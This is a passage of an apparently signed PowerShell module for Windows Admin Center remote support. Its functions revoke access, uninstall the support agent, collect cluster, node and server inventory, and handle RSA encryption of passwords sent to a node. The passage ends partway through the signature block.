Out-Null } else { Import-Module $module -ErrorAction Stop } } catch { Install-PackageProvider NuGet -Force | Out-Null # required to install the module Install-Module Az.StackHCI -Force | Out-Null } # Create log file $date = Get-Date $datestring = "{0}{1:d2}{2:d2}-{3:d2}{4:d2}" -f $date.year,$date.month,$date.day,$date.hour,$date.minute $logFileFolder = Join-Path -Path $env:TEMP -ChildPath "WACRemoteSupportLogs" if (-not(Test-Path $logFileFolder)) { New-Item -ItemType Directory -Path $logFileFolder } $logFileName = "WAC_Revoke_Access_" + $datestring + ".log" $logFilePath = Join-Path -Path $logFileFolder -ChildPath $logFileName Start-Transcript -Path $logFilePath Disable-AzStackHCIRemoteSupport Stop-Transcript } ## [END] Revoke-WACRSAccess ## function Test-WACRSScriptCanBeRun { <# .SYNOPSIS Test that a basic script can be run on a server. .DESCRIPTION Test that a basic script can be run on a server. .ROLE Readers #> return @{ScriptCanRun = $true} } ## [END] Test-WACRSScriptCanBeRun ## function Uninstall-WACRSAgent { <# .SYNOPSIS Uninstall Remote Support Agent + JEA endpoints .DESCRIPTION Uninstall Remote Support Agent + JEA endpoints .ROLE Administrators #> #Get the latest version of Az.StackHCI module try { $module = Get-Module -Name Az.StackHCI -ListAvailable | Sort-Object -Property Version -Descending | Microsoft.PowerShell.Utility\Select-Object -First 1 if ($module.version.major -lt 1 -and $module.version.minor -lt 10) { # insufficient version - get a new one from PS Gallery Install-PackageProvider NuGet -Force | Out-Null # required to install the module Install-Module Az.StackHCI -Force | Out-Null } else { Import-Module $module -ErrorAction Stop } } catch { Install-PackageProvider NuGet -Force | Out-Null # required to install the module Install-Module Az.StackHCI -Force | Out-Null } # Create log file $date = Get-Date $datestring = "{0}{1:d2}{2:d2}-{3:d2}{4:d2}" -f $date.year,$date.month,$date.day,$date.hour,$date.minute $logFileFolder = Join-Path -Path $env:TEMP -ChildPath "WACRemoteSupportLogs" if (-not(Test-Path $logFileFolder)) { New-Item -ItemType Directory -Path $logFileFolder } $logFileName = "WAC_Uninstall_Agent_" + $datestring + ".log" $logFilePath = Join-Path -Path $logFileFolder -ChildPath $logFileName Start-Transcript -Path $logFilePath Remove-AzStackHCIRemoteSupport Stop-Transcript } ## [END] Uninstall-WACRSAgent ## function Get-WACRSCimWin32LogicalDisk { <# .SYNOPSIS Gets Win32_LogicalDisk object. .DESCRIPTION Gets Win32_LogicalDisk object. .ROLE Readers #> ##SkipCheck=true## import-module CimCmdlets Get-CimInstance -Namespace root/cimv2 -ClassName Win32_LogicalDisk } ## [END] Get-WACRSCimWin32LogicalDisk ## function Get-WACRSCimWin32NetworkAdapter { <# .SYNOPSIS Gets Win32_NetworkAdapter object. .DESCRIPTION Gets Win32_NetworkAdapter object. .ROLE Readers #> ##SkipCheck=true## import-module CimCmdlets Get-CimInstance -Namespace root/cimv2 -ClassName Win32_NetworkAdapter } ## [END] Get-WACRSCimWin32NetworkAdapter ## function Get-WACRSCimWin32PhysicalMemory { <# .SYNOPSIS Gets Win32_PhysicalMemory object. .DESCRIPTION Gets Win32_PhysicalMemory object. .ROLE Readers #> ##SkipCheck=true## import-module CimCmdlets Get-CimInstance -Namespace root/cimv2 -ClassName Win32_PhysicalMemory } ## [END] Get-WACRSCimWin32PhysicalMemory ## function Get-WACRSCimWin32Processor { <# .SYNOPSIS Gets Win32_Processor object. .DESCRIPTION Gets Win32_Processor object. .ROLE Readers #> ##SkipCheck=true## import-module CimCmdlets Get-CimInstance -Namespace root/cimv2 -ClassName Win32_Processor } ## [END] Get-WACRSCimWin32Processor ## function Get-WACRSClusterInventory { <# .SYNOPSIS Retrieves the inventory data for a cluster. .DESCRIPTION Retrieves the inventory data for a cluster. .ROLE Readers #> Import-Module CimCmdlets -ErrorAction SilentlyContinue # JEA code requires to pre-import the module (this is slow on failover cluster environment.) Import-Module FailoverClusters -ErrorAction SilentlyContinue Import-Module Storage -ErrorAction SilentlyContinue <# .SYNOPSIS Get the name of this computer. .DESCRIPTION Get the best available name for this computer. The FQDN is preferred, but when not avaialble the NetBIOS name will be used instead. #> function getComputerName() { $computerSystem = Get-CimInstance Win32_ComputerSystem -ErrorAction SilentlyContinue | Microsoft.PowerShell.Utility\Select-Object Name, DNSHostName if ($computerSystem) { $computerName = $computerSystem.DNSHostName if ($null -eq $computerName) { $computerName = $computerSystem.Name } return $computerName } return $null } <# .SYNOPSIS Are the cluster PowerShell cmdlets installed on this server? .DESCRIPTION Are the cluster PowerShell cmdlets installed on this server? #> function getIsClusterCmdletAvailable() { $cmdlet = Get-Command "Get-Cluster" -ErrorAction SilentlyContinue return !!$cmdlet } <# .SYNOPSIS Get the MSCluster Cluster CIM instance from this server. .DESCRIPTION Get the MSCluster Cluster CIM instance from this server. #> function getClusterCimInstance() { $namespace = Get-CimInstance -Namespace root/MSCluster -ClassName __NAMESPACE -ErrorAction SilentlyContinue if ($namespace) { return Get-CimInstance -Namespace root/mscluster MSCluster_Cluster -ErrorAction SilentlyContinue | Microsoft.PowerShell.Utility\Select-Object fqdn, S2DEnabled } return $null } <# .SYNOPSIS Determines if the current cluster supports Failover Clusters Time Series Database. .DESCRIPTION Use the existance of the path value of cmdlet Get-StorageHealthSetting to determine if TSDB is supported or not. #> function getClusterPerformanceHistoryPath() { return $null -ne (Get-StorageSubSystem clus* | Get-StorageHealthSetting -Name "System.PerformanceHistory.Path") } <# .SYNOPSIS Get some basic information about the cluster from the cluster. .DESCRIPTION Get the needed cluster properties from the cluster. #> function getClusterInfo() { $returnValues = @{} $returnValues.Fqdn = $null $returnValues.isS2DEnabled = $false $returnValues.isTsdbEnabled = $false $cluster = getClusterCimInstance if ($cluster) { $returnValues.Fqdn = $cluster.fqdn $isS2dEnabled = !!(Get-Member -InputObject $cluster -Name "S2DEnabled") -and ($cluster.S2DEnabled -eq 1) $returnValues.isS2DEnabled = $isS2dEnabled if ($isS2DEnabled) { $returnValues.isTsdbEnabled = getClusterPerformanceHistoryPath } else { $returnValues.isTsdbEnabled = $false } } return $returnValues } <# .SYNOPSIS Are the cluster PowerShell Health cmdlets installed on this server? .DESCRIPTION Are the cluster PowerShell Health cmdlets installed on this server? s#> function getisClusterHealthCmdletAvailable() { $cmdlet = Get-Command -Name "Get-HealthFault" -ErrorAction SilentlyContinue return !!$cmdlet } <# .SYNOPSIS Are the Britannica (sddc management resources) available on the cluster? .DESCRIPTION Are the Britannica (sddc management resources) available on the cluster? #> function getIsBritannicaEnabled() { return $null -ne (Get-CimInstance -Namespace root/sddc/management -ClassName SDDC_Cluster -ErrorAction SilentlyContinue) } <# .SYNOPSIS Are the Britannica (sddc management resources) virtual machine available on the cluster? .DESCRIPTION Are the Britannica (sddc management resources) virtual machine available on the cluster? #> function getIsBritannicaVirtualMachineEnabled() { return $null -ne (Get-CimInstance -Namespace root/sddc/management -ClassName SDDC_VirtualMachine -ErrorAction SilentlyContinue) } <# .SYNOPSIS Are the Britannica (sddc management resources) virtual switch available on the cluster? .DESCRIPTION Are the Britannica (sddc management resources) virtual switch available on the cluster? #> function getIsBritannicaVirtualSwitchEnabled() { return $null -ne (Get-CimInstance -Namespace root/sddc/management -ClassName SDDC_VirtualSwitch -ErrorAction SilentlyContinue) } ########################################################################### # main() ########################################################################### $clusterInfo = getClusterInfo $result = New-Object PSObject $result | Add-Member -MemberType NoteProperty -Name 'Fqdn' -Value $clusterInfo.Fqdn $result | Add-Member -MemberType NoteProperty -Name 'IsS2DEnabled' -Value $clusterInfo.isS2DEnabled $result | Add-Member -MemberType NoteProperty -Name 'IsTsdbEnabled' -Value $clusterInfo.isTsdbEnabled $result | Add-Member -MemberType NoteProperty -Name 'IsClusterHealthCmdletAvailable' -Value (getIsClusterHealthCmdletAvailable) $result | Add-Member -MemberType NoteProperty -Name 'IsBritannicaEnabled' -Value (getIsBritannicaEnabled) $result | Add-Member -MemberType NoteProperty -Name 'IsBritannicaVirtualMachineEnabled' -Value (getIsBritannicaVirtualMachineEnabled) $result | Add-Member -MemberType NoteProperty -Name 'IsBritannicaVirtualSwitchEnabled' -Value (getIsBritannicaVirtualSwitchEnabled) $result | Add-Member -MemberType NoteProperty -Name 'IsClusterCmdletAvailable' -Value (getIsClusterCmdletAvailable) $result | Add-Member -MemberType NoteProperty -Name 'CurrentClusterNode' -Value (getComputerName) $result } ## [END] Get-WACRSClusterInventory ## function Get-WACRSClusterNodes { <# .SYNOPSIS Retrieves the inventory data for cluster nodes in a particular cluster. .DESCRIPTION Retrieves the inventory data for cluster nodes in a particular cluster. .ROLE Readers #> import-module CimCmdlets # JEA code requires to pre-import the module (this is slow on failover cluster environment.) import-module FailoverClusters -ErrorAction SilentlyContinue ############################################################################### # Constants ############################################################################### Set-Variable -Name LogName -Option Constant -Value "Microsoft-ServerManagementExperience" -ErrorAction SilentlyContinue Set-Variable -Name LogSource -Option Constant -Value "SMEScripts" -ErrorAction SilentlyContinue Set-Variable -Name ScriptName -Option Constant -Value $MyInvocation.ScriptName -ErrorAction SilentlyContinue <# .SYNOPSIS Are the cluster PowerShell cmdlets installed? .DESCRIPTION Use the Get-Command cmdlet to quickly test if the cluster PowerShell cmdlets are installed on this server. #> function getClusterPowerShellSupport() { $cmdletInfo = Get-Command 'Get-ClusterNode' -ErrorAction SilentlyContinue return $cmdletInfo -and $cmdletInfo.Name -eq "Get-ClusterNode" } <# .SYNOPSIS Get the cluster nodes using the cluster CIM provider. .DESCRIPTION When the cluster PowerShell cmdlets are not available fallback to using the cluster CIM provider to get the needed information. #> function getClusterNodeCimInstances() { # Change the WMI property NodeDrainStatus to DrainStatus to match the PS cmdlet output. return Get-CimInstance -Namespace root/mscluster MSCluster_Node -ErrorAction SilentlyContinue | ` Microsoft.PowerShell.Utility\Select-Object @{Name="DrainStatus"; Expression={$_.NodeDrainStatus}}, DynamicWeight, Name, NodeWeight, FaultDomain, State } <# .SYNOPSIS Get the cluster nodes using the cluster PowerShell cmdlets. .DESCRIPTION When the cluster PowerShell cmdlets are available use this preferred function. #> function getClusterNodePsInstances() { return Get-ClusterNode -ErrorAction SilentlyContinue | Microsoft.PowerShell.Utility\Select-Object DrainStatus, DynamicWeight, Name, NodeWeight, FaultDomain, State } <# .SYNOPSIS Use DNS services to get the FQDN of the cluster NetBIOS name. .DESCRIPTION Use DNS services to get the FQDN of the cluster NetBIOS name. .Notes It is encouraged that the caller add their approprate -ErrorAction when calling this function. #> function getClusterNodeFqdn([string]$clusterNodeName) { return ([System.Net.Dns]::GetHostEntry($clusterNodeName)).HostName } <# .SYNOPSIS Writes message to event log as warning. .DESCRIPTION Writes message to event log as warning. #> function writeToEventLog([string]$message) { Microsoft.PowerShell.Management\New-EventLog -LogName $LogName -Source $LogSource -ErrorAction SilentlyContinue Microsoft.PowerShell.Management\Write-EventLog -LogName $LogName -Source $LogSource -EventId 0 -Category 0 -EntryType Warning ` -Message $message -ErrorAction SilentlyContinue } <# .SYNOPSIS Get the cluster nodes. .DESCRIPTION When the cluster PowerShell cmdlets are available get the information about the cluster nodes using PowerShell. When the cmdlets are not available use the Cluster CIM provider. #> function getClusterNodes() { $isClusterCmdletAvailable = getClusterPowerShellSupport if ($isClusterCmdletAvailable) { $clusterNodes = getClusterNodePsInstances } else { $clusterNodes = getClusterNodeCimInstances } $clusterNodeMap = @{} foreach ($clusterNode in $clusterNodes) { $clusterNodeName = $clusterNode.Name.ToLower() try { $clusterNodeFqdn = getClusterNodeFqdn $clusterNodeName -ErrorAction SilentlyContinue } catch { $clusterNodeFqdn = $clusterNodeName writeToEventLog "[$ScriptName]: The fqdn for node '$clusterNodeName' could not be obtained. Defaulting to machine name '$clusterNodeName'" } $clusterNodeResult = New-Object PSObject $clusterNodeResult | Add-Member -MemberType NoteProperty -Name 'FullyQualifiedDomainName' -Value $clusterNodeFqdn $clusterNodeResult | Add-Member -MemberType NoteProperty -Name 'Name' -Value $clusterNodeName $clusterNodeResult | Add-Member -MemberType NoteProperty -Name 'DynamicWeight' -Value $clusterNode.DynamicWeight $clusterNodeResult | Add-Member -MemberType NoteProperty -Name 'NodeWeight' -Value $clusterNode.NodeWeight $clusterNodeResult | Add-Member -MemberType NoteProperty -Name 'FaultDomain' -Value $clusterNode.FaultDomain $clusterNodeResult | Add-Member -MemberType NoteProperty -Name 'State' -Value $clusterNode.State $clusterNodeResult | Add-Member -MemberType NoteProperty -Name 'DrainStatus' -Value $clusterNode.DrainStatus $clusterNodeMap.Add($clusterNodeName, $clusterNodeResult) } return $clusterNodeMap } ########################################################################### # main() ########################################################################### getClusterNodes } ## [END] Get-WACRSClusterNodes ## function Get-WACRSDecryptedDataFromNode { <# .SYNOPSIS Gets data after decrypting it on a node. .DESCRIPTION Decrypts data on node using a cached RSAProvider used during encryption within 3 minutes of encryption and returns the decrypted data. This script should be imported or copied directly to other scripts, do not send the returned data as an argument to other scripts. .PARAMETER encryptedData Encrypted data to be decrypted (String). .ROLE Readers #> param ( [Parameter(Mandatory = $true)] [String] $encryptedData ) Set-StrictMode -Version 5.0 New-Variable -Name rsaProviderInstanceName -Value "RSA" -Option Constant function DecryptDataWithJWKOnNode { if(Get-Variable -Scope Global -Name $rsaProviderInstanceName -EA SilentlyContinue) { $rsaProvider = (Get-Variable -Scope Global -Name $rsaProviderInstanceName).Value $decryptedBytes = $rsaProvider.Decrypt([Convert]::FromBase64String($encryptedData), [System.Security.Cryptography.RSAEncryptionPadding]::OaepSHA1) return [System.Text.Encoding]::UTF8.GetString($decryptedBytes) } # If you copy this script directly to another, you can get rid of the throw statement and add custom error handling logic such as "Write-Error" throw [System.InvalidOperationException] "Password decryption failed. RSACryptoServiceProvider Instance not found" } } ## [END] Get-WACRSDecryptedDataFromNode ## function Get-WACRSEncryptionJWKOnNode { <# .SYNOPSIS Gets encrytion JSON web key from node. .DESCRIPTION Gets encrytion JSON web key from node. .ROLE Readers #> Set-StrictMode -Version 5.0 New-Variable -Name rsaProviderInstanceName -Value "RSA" -Option Constant function Get-RSAProvider { if(Get-Variable -Scope Global -Name $rsaProviderInstanceName -EA SilentlyContinue) { return (Get-Variable -Scope Global -Name $rsaProviderInstanceName).Value } $Global:RSA = New-Object System.Security.Cryptography.RSACryptoServiceProvider -ArgumentList 4096 return $RSA } function Get-JsonWebKey { $rsaProvider = Get-RSAProvider $parameters = $rsaProvider.ExportParameters($false) return [PSCustomObject]@{ kty = 'RSA' alg = 'RSA-OAEP' e = [Convert]::ToBase64String($parameters.Exponent) n = [Convert]::ToBase64String($parameters.Modulus).TrimEnd('=').Replace('+', '-').Replace('/', '_') } } $jwk = Get-JsonWebKey ConvertTo-Json $jwk -Compress } ## [END] Get-WACRSEncryptionJWKOnNode ## function Get-WACRSServerInventory { <# .SYNOPSIS Retrieves the inventory data for a server. .DESCRIPTION Retrieves the inventory data for a server. .ROLE Readers #> Set-StrictMode -Version 5.0 Import-Module CimCmdlets Import-Module Storage -ErrorAction SilentlyContinue <# .SYNOPSIS Converts an arbitrary version string into just 'Major.Minor' .DESCRIPTION To make OS version comparisons we only want to compare the major and minor version. Build number and/os CSD are not interesting. #> function convertOsVersion([string]$osVersion) { [Ref]$parsedVersion = $null if (![Version]::TryParse($osVersion, $parsedVersion)) { return $null } $version = [Version]$parsedVersion.Value return New-Object Version -ArgumentList $version.Major, $version.Minor } <# .SYNOPSIS Determines if CredSSP is enabled for the current server or client. .DESCRIPTION Check the registry value for the CredSSP enabled state. #> function isCredSSPEnabled() { Set-Variable credSSPServicePath -Option Constant -Value "WSMan:\localhost\Service\Auth\CredSSP" Set-Variable credSSPClientPath -Option Constant -Value "WSMan:\localhost\Client\Auth\CredSSP" $credSSPServerEnabled = $false; $credSSPClientEnabled = $false; $credSSPServerService = Get-Item $credSSPServicePath -ErrorAction SilentlyContinue if ($credSSPServerService) { $credSSPServerEnabled = [System.Convert]::ToBoolean($credSSPServerService.Value) } $credSSPClientService = Get-Item $credSSPClientPath -ErrorAction SilentlyContinue if ($credSSPClientService) { $credSSPClientEnabled = [System.Convert]::ToBoolean($credSSPClientService.Value) } return ($credSSPServerEnabled -or $credSSPClientEnabled) } <# .SYNOPSIS Determines if the Hyper-V role is installed for the current server or client. .DESCRIPTION The Hyper-V role is installed when the VMMS service is available. This is much faster then checking Get-WindowsFeature and works on Windows Client SKUs. #> function isHyperVRoleInstalled() { $vmmsService = Get-Service -Name "VMMS" -ErrorAction SilentlyContinue return $vmmsService -and $vmmsService.Name -eq "VMMS" } <# .SYNOPSIS Determines if the Hyper-V PowerShell support module is installed for the current server or client. .DESCRIPTION The Hyper-V PowerShell support module is installed when the modules cmdlets are available. This is much faster then checking Get-WindowsFeature and works on Windows Client SKUs. #> function isHyperVPowerShellSupportInstalled() { # quicker way to find the module existence. it doesn't load the module. return !!(Get-Module -ListAvailable Hyper-V -ErrorAction SilentlyContinue) } <# .SYNOPSIS Determines if Windows Management Framework (WMF) 5.0, or higher, is installed for the current server or client. .DESCRIPTION Windows Admin Center requires WMF 5 so check the registey for WMF version on Windows versions that are less than Windows Server 2016. #> function isWMF5Installed([string] $operatingSystemVersion) { Set-Variable Server2016 -Option Constant -Value (New-Object Version '10.0') # And Windows 10 client SKUs Set-Variable Server2012 -Option Constant -Value (New-Object Version '6.2') $version = convertOsVersion $operatingSystemVersion if (-not $version) { # Since the OS version string is not properly formatted we cannot know the true installed state. return $false } if ($version -ge $Server2016) { # It's okay to assume that 2016 and up comes with WMF 5 or higher installed return $true } else { if ($version -ge $Server2012) { # Windows 2012/2012R2 are supported as long as WMF 5 or higher is installed $registryKey = 'HKLM:\SOFTWARE\Microsoft\PowerShell\3\PowerShellEngine' $registryKeyValue = Get-ItemProperty -Path $registryKey -Name PowerShellVersion -ErrorAction SilentlyContinue if ($registryKeyValue -and ($registryKeyValue.PowerShellVersion.Length -ne 0)) { $installedWmfVersion = [Version]$registryKeyValue.PowerShellVersion if ($installedWmfVersion -ge [Version]'5.0') { return $true } } } } return $false } <# .SYNOPSIS Determines if the current usser is a system administrator of the current server or client. .DESCRIPTION Determines if the current usser is a system administrator of the current server or client. #> function isUserAnAdministrator() { return ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator") } <# .SYNOPSIS Get some basic information about the Failover Cluster that is running on this server. .DESCRIPTION Create a basic inventory of the Failover Cluster that may be running in this server. #> function getClusterInformation() { $returnValues = @{ } $returnValues.IsS2dEnabled = $false $returnValues.IsCluster = $false $returnValues.ClusterFqdn = $null $returnValues.IsBritannicaEnabled = $false $namespace = Get-CimInstance -Namespace root/MSCluster -ClassName __NAMESPACE -ErrorAction SilentlyContinue if ($namespace) { $cluster = Get-CimInstance -Namespace root/MSCluster -ClassName MSCluster_Cluster -ErrorAction SilentlyContinue if ($cluster) { $returnValues.IsCluster = $true $returnValues.ClusterFqdn = $cluster.Fqdn $returnValues.IsS2dEnabled = !!(Get-Member -InputObject $cluster -Name "S2DEnabled") -and ($cluster.S2DEnabled -gt 0) $returnValues.IsBritannicaEnabled = $null -ne (Get-CimInstance -Namespace root/sddc/management -ClassName SDDC_Cluster -ErrorAction SilentlyContinue) } } return $returnValues } <# .SYNOPSIS Get the Fully Qaulified Domain (DNS domain) Name (FQDN) of the passed in computer name. .DESCRIPTION Get the Fully Qaulified Domain (DNS domain) Name (FQDN) of the passed in computer name. #> function getComputerFqdnAndAddress($computerName) { $hostEntry = [System.Net.Dns]::GetHostEntry($computerName) $addressList = @() foreach ($item in $hostEntry.AddressList) { $address = New-Object PSObject $address | Add-Member -MemberType NoteProperty -Name 'IpAddress' -Value $item.ToString() $address | Add-Member -MemberType NoteProperty -Name 'AddressFamily' -Value $item.AddressFamily.ToString() $addressList += $address } $result = New-Object PSObject $result | Add-Member -MemberType NoteProperty -Name 'Fqdn' -Value $hostEntry.HostName $result | Add-Member -MemberType NoteProperty -Name 'AddressList' -Value $addressList return $result } <# .SYNOPSIS Get the Fully Qaulified Domain (DNS domain) Name (FQDN) of the current server or client. .DESCRIPTION Get the Fully Qaulified Domain (DNS domain) Name (FQDN) of the current server or client. #> function getHostFqdnAndAddress($computerSystem) { $computerName = $computerSystem.DNSHostName if (!$computerName) { $computerName = $computerSystem.Name } return getComputerFqdnAndAddress $computerName } <# .SYNOPSIS Are the needed management CIM interfaces available on the current server or client. .DESCRIPTION Check for the presence of the required server management CIM interfaces. #> function getManagementToolsSupportInformation() { $returnValues = @{ } $returnValues.ManagementToolsAvailable = $false $returnValues.ServerManagerAvailable = $false $namespaces = Get-CimInstance -Namespace root/microsoft/windows -ClassName __NAMESPACE -ErrorAction SilentlyContinue if ($namespaces) { $returnValues.ManagementToolsAvailable = !!($namespaces | Where-Object { $_.Name -ieq "ManagementTools" }) $returnValues.ServerManagerAvailable = !!($namespaces | Where-Object { $_.Name -ieq "ServerManager" }) } return $returnValues } <# .SYNOPSIS Check the remote app enabled or not. .DESCRIPTION Check the remote app enabled or not. #> function isRemoteAppEnabled() { Set-Variable key -Option Constant -Value "HKLM:\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Terminal Server\\TSAppAllowList" $registryKeyValue = Get-ItemProperty -Path $key -Name fDisabledAllowList -ErrorAction SilentlyContinue if (-not $registryKeyValue) { return $false } return $registryKeyValue.fDisabledAllowList -eq 1 } <# .SYNOPSIS Check the remote app enabled or not. .DESCRIPTION Check the remote app enabled or not. #> <# c .SYNOPSIS Get the Win32_OperatingSystem information .DESCRIPTION Get the Win32_OperatingSystem instance and filter the results to just the required properties. This filtering will make the response payload much smaller. #> function getOperatingSystemInfo() { return Get-CimInstance Win32_OperatingSystem | Microsoft.PowerShell.Utility\Select-Object csName, Caption, OperatingSystemSKU, Version, ProductType, OSType, LastBootUpTime } <# .SYNOPSIS Get the Win32_ComputerSystem information .DESCRIPTION Get the Win32_ComputerSystem instance and filter the results to just the required properties. This filtering will make the response payload much smaller. #> function getComputerSystemInfo() { return Get-CimInstance Win32_ComputerSystem -ErrorAction SilentlyContinue | ` Microsoft.PowerShell.Utility\Select-Object TotalPhysicalMemory, DomainRole, Manufacturer, Model, NumberOfLogicalProcessors, Domain, Workgroup, DNSHostName, Name, PartOfDomain, SystemFamily, SystemSKUNumber } <# .SYNOPSIS script to query SMBIOS locally from the passed in machineName .DESCRIPTION script to query SMBIOS locally from the passed in machine name #> function getSmbiosData($computerSystem) { <# Array of chassis types. The following list of ChassisTypes is copied from the latest DMTF SMBIOS specification. REF: https://www.dmtf.org/sites/default/files/standards/documents/DSP0134_3.1.1.pdf #> $ChassisTypes = @{ 1 = 'Other' 2 = 'Unknown' 3 = 'Desktop' 4 = 'Low Profile Desktop' 5 = 'Pizza Box' 6 = 'Mini Tower' 7 = 'Tower' 8 = 'Portable' 9 = 'Laptop' 10 = 'Notebook' 11 = 'Hand Held' 12 = 'Docking Station' 13 = 'All in One' 14 = 'Sub Notebook' 15 = 'Space-Saving' 16 = 'Lunch Box' 17 = 'Main System Chassis' 18 = 'Expansion Chassis' 19 = 'SubChassis' 20 = 'Bus Expansion Chassis' 21 = 'Peripheral Chassis' 22 = 'Storage Chassis' 23 = 'Rack Mount Chassis' 24 = 'Sealed-Case PC' 25 = 'Multi-system chassis' 26 = 'Compact PCI' 27 = 'Advanced TCA' 28 = 'Blade' 29 = 'Blade Enclosure' 30 = 'Tablet' 31 = 'Convertible' 32 = 'Detachable' 33 = 'IoT Gateway' 34 = 'Embedded PC' 35 = 'Mini PC' 36 = 'Stick PC' } $list = New-Object System.Collections.ArrayList $win32_Bios = Get-CimInstance -class Win32_Bios $obj = New-Object -Type PSObject | Microsoft.PowerShell.Utility\Select-Object SerialNumber, Manufacturer, UUID, BaseBoardProduct, ChassisTypes, Chassis, SystemFamily, SystemSKUNumber, SMBIOSAssetTag $obj.SerialNumber = $win32_Bios.SerialNumber $obj.Manufacturer = $win32_Bios.Manufacturer $computerSystemProduct = Get-CimInstance Win32_ComputerSystemProduct if ($null -ne $computerSystemProduct) { $obj.UUID = $computerSystemProduct.UUID } $baseboard = Get-CimInstance Win32_BaseBoard if ($null -ne $baseboard) { $obj.BaseBoardProduct = $baseboard.Product } $systemEnclosure = Get-CimInstance Win32_SystemEnclosure if ($null -ne $systemEnclosure) { $obj.SMBIOSAssetTag = $systemEnclosure.SMBIOSAssetTag } $obj.ChassisTypes = Get-CimInstance Win32_SystemEnclosure | Microsoft.PowerShell.Utility\Select-Object -ExpandProperty ChassisTypes $obj.Chassis = New-Object -TypeName 'System.Collections.ArrayList' $obj.ChassisTypes | ForEach-Object -Process { $obj.Chassis.Add($ChassisTypes[[int]$_]) } $obj.SystemFamily = $computerSystem.SystemFamily $obj.SystemSKUNumber = $computerSystem.SystemSKUNumber $list.Add($obj) | Out-Null return $list } ########################################################################### # main() ########################################################################### $operatingSystem = getOperatingSystemInfo $computerSystem = getComputerSystemInfo $isAdministrator = isUserAnAdministrator $fqdnAndAddress = getHostFqdnAndAddress $computerSystem $hostname = [Environment]::MachineName $netbios = $env:ComputerName $managementToolsInformation = getManagementToolsSupportInformation $isWmfInstalled = isWMF5Installed $operatingSystem.Version $clusterInformation = getClusterInformation -ErrorAction SilentlyContinue $isHyperVPowershellInstalled = isHyperVPowerShellSupportInstalled $isHyperVRoleInstalled = isHyperVRoleInstalled $isCredSSPEnabled = isCredSSPEnabled $isRemoteAppEnabled = isRemoteAppEnabled $smbiosData = getSmbiosData $computerSystem $result = New-Object PSObject $result | Add-Member -MemberType NoteProperty -Name 'IsAdministrator' -Value $isAdministrator $result | Add-Member -MemberType NoteProperty -Name 'OperatingSystem' -Value $operatingSystem $result | Add-Member -MemberType NoteProperty -Name 'ComputerSystem' -Value $computerSystem $result | Add-Member -MemberType NoteProperty -Name 'Fqdn' -Value $fqdnAndAddress.Fqdn $result | Add-Member -MemberType NoteProperty -Name 'AddressList' -Value $fqdnAndAddress.AddressList $result | Add-Member -MemberType NoteProperty -Name 'Hostname' -Value $hostname $result | Add-Member -MemberType NoteProperty -Name 'NetBios' -Value $netbios $result | Add-Member -MemberType NoteProperty -Name 'IsManagementToolsAvailable' -Value $managementToolsInformation.ManagementToolsAvailable $result | Add-Member -MemberType NoteProperty -Name 'IsServerManagerAvailable' -Value $managementToolsInformation.ServerManagerAvailable $result | Add-Member -MemberType NoteProperty -Name 'IsWmfInstalled' -Value $isWmfInstalled $result | Add-Member -MemberType NoteProperty -Name 'IsCluster' -Value $clusterInformation.IsCluster $result | Add-Member -MemberType NoteProperty -Name 'ClusterFqdn' -Value $clusterInformation.ClusterFqdn $result | Add-Member -MemberType NoteProperty -Name 'IsS2dEnabled' -Value $clusterInformation.IsS2dEnabled $result | Add-Member -MemberType NoteProperty -Name 'IsBritannicaEnabled' -Value $clusterInformation.IsBritannicaEnabled $result | Add-Member -MemberType NoteProperty -Name 'IsHyperVRoleInstalled' -Value $isHyperVRoleInstalled $result | Add-Member -MemberType NoteProperty -Name 'IsHyperVPowershellInstalled' -Value $isHyperVPowershellInstalled $result | Add-Member -MemberType NoteProperty -Name 'IsCredSSPEnabled' -Value $isCredSSPEnabled $result | Add-Member -MemberType NoteProperty -Name 'IsRemoteAppEnabled' -Value $isRemoteAppEnabled $result | Add-Member -MemberType NoteProperty -Name 'SmbiosData' -Value $smbiosData $result } ## [END] Get-WACRSServerInventory ## # SIG # Begin signature block # MIInvwYJKoZIhvcNAQcCoIInsDCCJ6wCAQExDzANBglghkgBZQMEAgEFADB5Bgor # BgEEAYI3AgEEoGswaTA0BgorBgEEAYI3AgEeMCYCAwEAAAQQH8w7YFlLCE63JNLG # KX7zUQIBAAIBAAIBAAIBAAIBADAxMA0GCWCGSAFlAwQCAQUABCDoVICss30Y9gFM # i14pylZ4zHgJbSZokxW5RoSFtdsRAaCCDXYwggX0MIID3KADAgECAhMzAAADTrU8 # esGEb+srAAAAAANOMA0GCSqGSIb3DQEBCwUAMH4xCzAJBgNVBAYTAlVTMRMwEQYD # VQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4wHAYDVQQKExVNaWNy # b3NvZnQgQ29ycG9yYXRpb24xKDAmBgNVBAMTH01pY3Jvc29mdCBDb2RlIFNpZ25p # bmcgUENBIDIwMTEwHhcNMjMwMzE2MTg0MzI5WhcNMjQwMzE0MTg0MzI5WjB0MQsw # CQYDVQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4GA1UEBxMHUmVkbW9u # ZDEeMBwGA1UEChMVTWljcm9zb2Z0IENvcnBvcmF0aW9uMR4wHAYDVQQDExVNaWNy # b3NvZnQgQ29ycG9yYXRpb24wggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIB # AQDdCKiNI6IBFWuvJUmf6WdOJqZmIwYs5G7AJD5UbcL6tsC+EBPDbr36pFGo1bsU # p53nRyFYnncoMg8FK0d8jLlw0lgexDDr7gicf2zOBFWqfv/nSLwzJFNP5W03DF/1 # 1oZ12rSFqGlm+O46cRjTDFBpMRCZZGddZlRBjivby0eI1VgTD1TvAdfBYQe82fhm # WQkYR/lWmAK+vW/1+bO7jHaxXTNCxLIBW07F8PBjUcwFxxyfbe2mHB4h1L4U0Ofa # +HX/aREQ7SqYZz59sXM2ySOfvYyIjnqSO80NGBaz5DvzIG88J0+BNhOu2jl6Dfcq # jYQs1H/PMSQIK6E7lXDXSpXzAgMBAAGjggFzMIIBbzAfBgNVHSUEGDAWBgorBgEE # AYI3TAgBBggrBgEFBQcDAzAdBgNVHQ4EFgQUnMc7Zn/ukKBsBiWkwdNfsN5pdwAw # RQYDVR0RBD4wPKQ6MDgxHjAcBgNVBAsTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEW # 